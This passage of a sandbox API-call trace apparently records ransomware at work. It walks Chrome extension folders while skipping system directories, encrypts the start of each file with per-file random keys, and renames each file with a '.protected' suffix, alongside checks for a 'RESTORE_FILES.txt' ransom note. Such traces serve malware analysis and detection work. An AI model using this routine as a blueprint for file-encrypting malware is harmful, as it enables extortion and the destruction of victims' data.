(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.418] StrStrW (lpFirst="cast_game_sender.js", lpSrch=".zip") returned 0x0 [0082.418] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.423] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.423] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.424] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.424] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, 
lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.541] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.541] CloseHandle (hObject=0x160) returned 1 [0082.541] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.protected") returned 168 [0082.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.protected")) returned 1 [0082.542] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="Windows") returned -1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="Program Files") returned -1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="Program Files (x86)") returned -1 [0082.542] lstrcmpiW (lpString1="cast_route_details.html", lpString2="$Recycle.bin") returned 1 [0082.542] lstrcmpiW 
(lpString1="cast_route_details.html", lpString2="System Volume Information") returned -1 [0082.542] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.542] StrStrIW (lpFirst="cast_route_details.html", lpSrch=".protected") returned 0x0 [0082.542] lstrcmpW (lpString1="cast_route_details.html", lpString2="RESTORE_FILES.txt") returned -1 [0082.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0082.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.543] StrStrW (lpFirst="cast_route_details.html", lpSrch=".txt") returned 0x0 [0082.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.543] StrStrW 
(lpFirst="cast_route_details.html", lpSrch=".rar") returned 0x0 [0082.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html") returned 162 [0082.543] StrStrW (lpFirst="cast_route_details.html", lpSrch=".zip") returned 0x0 [0082.543] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.798] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.798] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.799] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.799] CloseHandle (hObject=0x160) returned 1 [0082.799] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.protected") returned 172 [0082.799] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.protected")) returned 1 [0082.800] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="Windows") returned -1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="Program Files") returned -1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="Program Files (x86)") returned -1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="$Recycle.bin") returned 1 [0082.800] lstrcmpiW (lpString1="cast_route_details.js", lpString2="System Volume Information") returned -1 [0082.800] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.800] StrStrIW (lpFirst="cast_route_details.js", lpSrch=".protected") returned 0x0 [0082.800] lstrcmpW (lpString1="cast_route_details.js", lpString2="RESTORE_FILES.txt") returned -1 [0082.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 
[0082.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.801] StrStrW (lpFirst="cast_route_details.js", lpSrch=".txt") returned 0x0 [0082.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.801] StrStrW (lpFirst="cast_route_details.js", lpSrch=".rar") returned 0x0 [0082.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js") returned 160 [0082.801] StrStrW (lpFirst="cast_route_details.js", lpSrch=".zip") returned 0x0 [0082.801] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.967] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.967] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.967] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.024] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.024] CloseHandle (hObject=0x160) returned 1 [0083.024] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.protected") returned 170 [0083.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.protected")) returned 1 [0083.025] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="Windows") returned -1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="Program Files") returned -1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="Program Files (x86)") returned -1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="$Recycle.bin") returned 1 [0083.025] lstrcmpiW (lpString1="cast_sender.js", lpString2="System Volume Information") returned -1 [0083.025] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.025] StrStrIW (lpFirst="cast_sender.js", lpSrch=".protected") returned 0x0 [0083.025] lstrcmpW (lpString1="cast_sender.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x160 [0083.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.026] StrStrW (lpFirst="cast_sender.js", lpSrch=".txt") returned 0x0 [0083.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.026] StrStrW (lpFirst="cast_sender.js", lpSrch=".rar") returned 0x0 [0083.026] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0083.026] StrStrW (lpFirst="cast_sender.js", lpSrch=".zip") returned 0x0 [0083.026] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.090] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.090] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.090] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.090] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.091] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.091] CloseHandle (hObject=0x160) returned 1 [0083.091] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.protected") returned 163 [0083.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.protected")) returned 1 [0083.092] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.092] lstrcmpiW (lpString1="cast_setup", lpString2="Windows") returned -1 [0083.092] lstrcmpiW (lpString1="cast_setup", lpString2="Program Files") returned -1 [0083.092] lstrcmpiW (lpString1="cast_setup", lpString2="Program Files (x86)") returned -1 [0083.093] lstrcmpiW (lpString1="cast_setup", lpString2="$Recycle.bin") returned 1 [0083.093] lstrcmpiW (lpString1="cast_setup", lpString2="System Volume Information") returned -1 [0083.093] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned 149 [0083.093] lstrcmpW (lpString1="cast_setup", lpString2=".") returned 1 [0083.093] lstrcmpW (lpString1="cast_setup", lpString2="..") returned 1 [0083.093] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*") returned 151 [0083.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0083.134] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.134] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.134] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.134] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.134] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.134] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\.") returned 151 [0083.134] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.134] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.135] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.135] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.135] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.135] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.135] lstrcmpiW (lpString1="..", 
lpString2="System Volume Information") returned -1 [0083.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\..") returned 152 [0083.135] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.135] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.135] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="Windows") returned -1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="Program Files") returned -1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="Program Files (x86)") returned -1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="$Recycle.bin") returned 1 [0083.135] lstrcmpiW (lpString1="cast_app.css", lpString2="System Volume Information") returned -1 [0083.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.135] StrStrIW (lpFirst="cast_app.css", lpSrch=".protected") returned 0x0 [0083.135] lstrcmpW (lpString1="cast_app.css", lpString2="RESTORE_FILES.txt") returned -1 [0083.135] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.135] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.136] StrStrW (lpFirst="cast_app.css", lpSrch=".txt") returned 0x0 [0083.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.136] StrStrW (lpFirst="cast_app.css", lpSrch=".rar") returned 0x0 [0083.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css") returned 162 [0083.136] StrStrW (lpFirst="cast_app.css", lpSrch=".zip") returned 0x0 [0083.136] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x1a1d, lpOverlapped=0x0) returned 1 [0083.163] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffe5e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.163] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, 